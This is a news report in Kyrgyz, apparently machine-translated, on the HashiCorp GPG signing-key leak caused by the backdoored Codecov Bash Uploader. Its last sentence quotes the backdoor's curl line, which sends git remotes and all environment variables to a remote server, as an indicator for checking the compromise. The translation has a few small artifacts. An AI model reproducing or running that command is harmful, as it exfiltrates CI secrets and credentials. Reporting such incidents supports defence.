Vagrant, Packer, Nomad жана Terraform ачык булак куралдарын иштеп чыгуу менен белгилүү болгон HashiCorp релиздерди текшерүүчү санарип кол тамгаларды түзүү үчүн колдонулган жеке GPG ачкычынын агып кеткенин жарыялады. GPG ачкычына кирүү мүмкүнчүлүгүнө ээ болгон чабуулчулар HashiCorp өнүмдөрүн туура санарип кол тамгасы менен текшерүү аркылуу аларга жашыруун өзгөртүүлөрдү киргизиши мүмкүн. Ошол эле учурда компания аудиттин жүрүшүндө мындай өзгөртүүлөрдү киргизүү аракетинин издери аныкталган жок деп билдирди.
Учурда бузулган GPG ачкычы жокко чыгарылып, анын ордуна жаңы ачкыч киргизилди. Көйгөй SHA256SUM жана SHA256SUM.sig файлдарын колдонуу менен текшерүүгө гана таасирин тийгизди жана Linux DEB жана releases.hashicorp.com аркылуу берилген RPM пакеттери үчүн санариптик кол тамгалардын жаралышына, ошондой эле macOS жана Windows (AuthentiCode) үчүн релиз текшерүү механизмдерине таасирин тийгизген жок. .
Ашып кетүү инфраструктурада үзгүлтүксүз интеграция тутумдарынан камтуу отчетторун жүктөө үчүн иштелип чыккан Codecov Bash Uploader (codecov-bash) скриптин колдонуудан улам болгон. Codecov компаниясына кол салуу учурунда көрсөтүлгөн скрипттин ичине бэкдор катылган, ал аркылуу сырсөздөр жана шифрлөө ачкычтары чабуулчулардын серверине жөнөтүлгөн.
Хакерлик кылуу үчүн чабуулчулар Codecov Docker сүрөтүн түзүү процессиндеги катадан пайдаланышты, бул аларга codecov.io сайтынан таратылган Bash Uploader скриптине өзгөртүүлөрдү киргизүү үчүн зарыл болгон GCS (Google Cloud Storage) кирүү маалыматтарын чыгарууга мүмкүндүк берди. веб-сайт. Өзгөртүүлөр 31-январда кайра киргизилип, эки ай бою байкалбай калды жана чабуулчуларга кардарлардын үзгүлтүксүз интеграцияланган тутум чөйрөлөрүндө сакталган маалыматты чыгарып алууга мүмкүндүк берди. Кошулган зыяндуу кодду колдонуу менен чабуулчулар сыналган Git репозиторийлери жана айлана-чөйрөнүн бардык өзгөрмөлөрү, анын ичинде токендер, шифрлөө ачкычтары жана Amazon Web Services жана GitHub сыяктуу тиркеме кодуна, репозиторийлерге жана кызматтарга кирүү мүмкүнчүлүгүн уюштуруу үчүн үзгүлтүксүз интеграциялык тутумдарга өткөрүлүп берилген сырсөздөрдү ала алышкан.
Түз чалуудан тышкары, Codecov Bash Uploader скрипти Codecov-action (Github), Codecov-circleci-orb жана Codecov-bitrise-step сыяктуу башка жүктөөчүлөрдүн бир бөлүгү катары колдонулган, алардын колдонуучулары да көйгөйгө дуушар болушат. Codecov-bash жана ага тиешелүү өнүмдөрдүн бардык колдонуучуларына алардын инфраструктурасын текшерүү, ошондой эле сырсөздөрдү жана шифрлөө ачкычтарын өзгөртүү сунушталат. Скриптте бэкдордун бар экендигин curl -sm 0.5 -d “$(git remote -v)<<<<<< ENV $(env)” сызыгынын болушу менен текшере аласыз http:// /upload/v2 || чын
Source: opennet.ru